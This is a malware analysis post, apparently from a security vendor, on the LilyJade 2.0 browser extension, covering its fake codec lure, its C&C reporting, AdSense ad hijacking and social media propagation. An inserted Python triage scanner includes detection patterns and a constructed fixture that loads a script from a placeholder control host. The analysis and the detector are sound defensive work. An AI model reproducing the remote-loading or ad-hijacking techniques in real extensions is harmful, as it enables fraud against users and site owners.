LilyJade Version 2.0 – Malicious Browser Extension
Several web browsers compete in the market, and gaining popularity and wider use among users requires extra features beyond plain web browsing. Vendors therefore add features to their browsers; one of them is the browser plug-in, which browsers use to attract a larger audience.
Extensions are used to extend the browser's functionality. Almost all popular browsers support them, and they have become one of the most commonly used malware attack vectors. The attackers choose social networking sites as their favourite breeding ground.
This is how it begins:
Figure 1: Fake YouTube Site
We came across a scam that tricks the user into installing a fake video codec extension in order to view a video. When users install this kind of malicious extension, their system becomes vulnerable to attacks. During our research we found that the malicious browser extension, installed as a fake video codec update, becomes active each time the browser is opened: the extension is loaded and downloads malicious JavaScript from a remote server to carry out its activities.
Once this malicious extension is installed, the browser's security is compromised. The extension sends information such as the IP address, country and installed OS to the malware author. In addition, it reports whether the user is online and which websites the compromised user is viewing.
Figure 3: C&C Server
The above statistics show around 7837 compromised unique IPs, of which around 176 users were online.
The other fields present in the C&C server are:
- IP – IP address of the compromised browser.
- Country – Location of the compromised browser.
- OS – Operating System installed on the system.
- URL – The web page currently being viewed in the compromised browser.
- Status – Whether the compromised browser is currently available (online) or not.
The script enumerates the advertisements on the following websites (Yahoo, YouTube, Bing, AOL, Google and Facebook) and replaces them with the attacker's own advertisements. The AdSense ID (in this case “ca-pub-33xx398xxxx84xx1”) is unique to each AdSense user, so replacing the advertisements with ones carrying the attacker's AdSense ID routes the ad revenue to the attacker's account.
Figure 4: Function to Replace Ads
Apart from the domains mentioned above, the script also replaces advertisements on other websites. Before doing so, it checks whether the page the user is viewing contains any porn content by comparing it against the keywords listed below; if a match is found, the ads on that page are left untouched, because displaying Google AdSense advertisements on porn or hacking websites would get the account banned.
Figure 5: Checking whether the website has Porn content
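The two behaviours described above (an extension that pulls script from a remote server when the browser starts, and ad replacement keyed to a hard-coded AdSense publisher ID) are both visible in the extension's static source. The following Python triage scanner is an added example for analysts and is not code from the original post or from the malware; it walks an unpacked extension directory, scans each .js file and scores a small indicator table. The indicator regexes, their weights, the score thresholds, the placeholder host `cnc.example.invalid` and the all-zero AdSense ID in the constructed sample are all this example's assumptions, not values from the page.

```python
"""Static triage of an unpacked browser extension (added example, not from the post)."""
import re
import tempfile
from pathlib import Path

# Indicator table: (name, compiled regex, weight). This table is the example's own
# assumption; weights only produce a triage score, not a verdict by themselves.
INDICATORS = [
    # script fetched from a remote server, as the fake codec extension does at start-up
    ("remote_script_url", re.compile(r"https?://[^\s\"']+\.js\b", re.I), 3),
    # <script> element created at runtime, the usual way to load that remote file
    ("dynamic_script_element", re.compile(r"createElement\(\s*[\"']script[\"']\s*\)"), 2),
    # eval of downloaded content
    ("eval_call", re.compile(r"\beval\s*\("), 1),
    # a full AdSense publisher ID hard-coded in an extension is a strong ad-rewrite hint
    ("adsense_publisher_id", re.compile(r"\bca-pub-\d{10,16}\b"), 3),
    # assignment to the AdSense client variable inside an extension script
    ("ad_client_assignment", re.compile(r"google_ad_client\s*="), 2),
]


def scan_source(text: str) -> list:
    """Return the names of every indicator that fires on one script's source text."""
    return [name for name, rx, _ in INDICATORS if rx.search(text)]


def verdict(score: int) -> str:
    """Map the triage score to a label (thresholds are assumed, tune to your corpus)."""
    if score >= 5:
        return "suspicious: remote code loading and/or ad rewriting indicators"
    if score > 0:
        return "review"
    return "no indicators"


def scan_extension(root: Path) -> dict:
    """Walk an unpacked extension, scan every .js file, return per-file hits and a score."""
    findings = {}
    score = 0
    for path in sorted(root.rglob("*.js")):
        hits = scan_source(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            findings[path.relative_to(root).as_posix()] = hits
            score += sum(weight for name, _, weight in INDICATORS if name in hits)
    return {"findings": findings, "score": score, "verdict": verdict(score)}


def build_sample_extension() -> Path:
    """Create a throwaway extension tree. All contents are constructed test data."""
    root = Path(tempfile.mkdtemp(prefix="ext_triage_"))
    (root / "chrome" / "content").mkdir(parents=True)
    (root / "lib").mkdir()
    # constructed overlay script showing the two behaviours; host and ID are placeholders
    (root / "chrome" / "content" / "overlay.js").write_text(
        'var s = document.createElement("script");\n'
        's.src = "http://cnc.example.invalid/update.js"; // placeholder host\n'
        'document.documentElement.appendChild(s);\n'
        'google_ad_client = "ca-pub-0000000000000000"; // constructed, not a real ID\n',
        encoding="utf-8",
    )
    # benign helper, should produce no hits
    (root / "lib" / "utils.js").write_text(
        'function trim(s) { return s.replace(/^\\s+|\\s+$/g, ""); }\n', encoding="utf-8"
    )
    return root


if __name__ == "__main__":
    report = scan_extension(build_sample_extension())
    for file, hits in report["findings"].items():
        print(f"{file}: {', '.join(hits)}")
    print(f"score={report['score']} -> {report['verdict']}")
```

To use it on a real sample, unzip the .xpi (it is a plain zip archive) into a directory and call `scan_extension(Path("that_dir"))`. Because the post shows the AdSense ID only in redacted form, the publisher-ID regex here requires a full numeric ID; a legitimate extension that embeds its own publisher ID will also fire, which is why the output is a score for an analyst rather than a block decision.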
The cyber criminals also run a service selling Facebook likes. They mainly target small companies, games or applications that need more visibility and fans on Facebook, and the malicious script promotes some Facebook pages as well.
Figure 6: Promoting the Pages in Facebook
The page above belongs to an affiliate who spread this malicious extension. It gained more than 5000 likes in the last three weeks, which indicates how long this malware has been in circulation: in this case, about three weeks.
This version of LilyJade spreads through Facebook and Twitter by posting scam messages from the compromised account. The code below clearly shows its propagation technique.
Figure 7: Propagation Through Scams
This version of LilyJade supports only the Firefox, Chrome and Safari browsers. This analysis is based on the Firefox extension, which is not part of the Crossrider framework.
Facebook has partnered with McAfee to detect these types of malicious extensions. Any Facebook user who suspects they are infected can check with McAfee Scan and Repair.